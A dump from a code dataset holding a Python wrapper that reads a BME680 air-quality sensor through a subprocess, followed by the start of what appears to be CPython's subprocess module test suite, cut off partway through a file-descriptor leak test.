source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
bme680.py
|
#! /usr/bin/env python3
import subprocess
import threading
import re
import os
import time
BME_PATH = os.path.dirname(__file__)+'/../../bme680/bsec_bme680_linux/bsec_bme680'
class Bme680 (object):
def __init__(self):
self._data_lock = threading.Lock()
self._ready = False
self._iaq = 0
self._iaq_acc = 0
self._temperature = 0
self._humidity = 0
self._pressure = 0
self._eco2 = 0
self._bvoce = 0
threading.Thread(target=self._update_data).start()
def _update_data(self):
p = subprocess.Popen(['./bsec_bme680'], cwd=os.path.dirname(__file__)+'/bme680_auxbin/bsec_bme680_linux/', stdout=subprocess.PIPE, text=True)
regex = re.compile(r'\((\d)\).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+)')
for line in p.stdout:
result = regex.search(line)
if result is None:
raise RuntimeError('BME680: Line "{}" out of expected format'.format(line))
with self._data_lock:
self._ready = True
self._iaq_acc = result[1]
self._iaq = result[2]
self._temperature = result[3]
self._humidity = result[4]
self._pressure = result[5]
self._eco2 = result[8]
self._bvoce = result[9]
def read_data(self, interval = 0):
ret = None
time.sleep(interval)
while True:
with self._data_lock:
if self._ready:
ret = (int(self._iaq_acc),
float(self._iaq),
float(self._temperature),
float(self._humidity),
float(self._pressure),
float(self._eco2),
float(self._bvoce))
break
time.sleep(1)
return ret
if __name__ == '__main__':
bme680 = Bme680()
# ctrl+c to close
while True:
data = bme680.read_data(interval = 5)
print('''
IAQ accuracy : {}
IAQ : {}
T degC : {}
H %rH : {}
P hPa : {}
eCO2 ppm : {}
bVOCe ppm : {}
'''.format(*data))
|
test_subprocess.py
|
import unittest
from test import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import selectors
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(FileNotFoundError, self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
original_cwd = os.getcwd()
os.chdir(cwd)
cwd = os.getcwd()
os.chdir(original_cwd)
return cwd
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with script_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_ouput(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
import _bootlocale
for encoding in ['utf-16', 'utf-32-be']:
old_getpreferredencoding = _bootlocale.getpreferredencoding
# Indirectly via io.TextIOWrapper, Popen() defaults to
# locale.getpreferredencoding(False) and earlier in Python 3.2 to
# locale.getpreferredencoding().
def getpreferredencoding(do_setlocale=True):
return encoding
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
try:
_bootlocale.getpreferredencoding = getpreferredencoding
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args, universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = popen.communicate(input='')
finally:
_bootlocale.getpreferredencoding = old_getpreferredencoding
self.assertEqual(stdout, '1\n2\n3\n4')
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
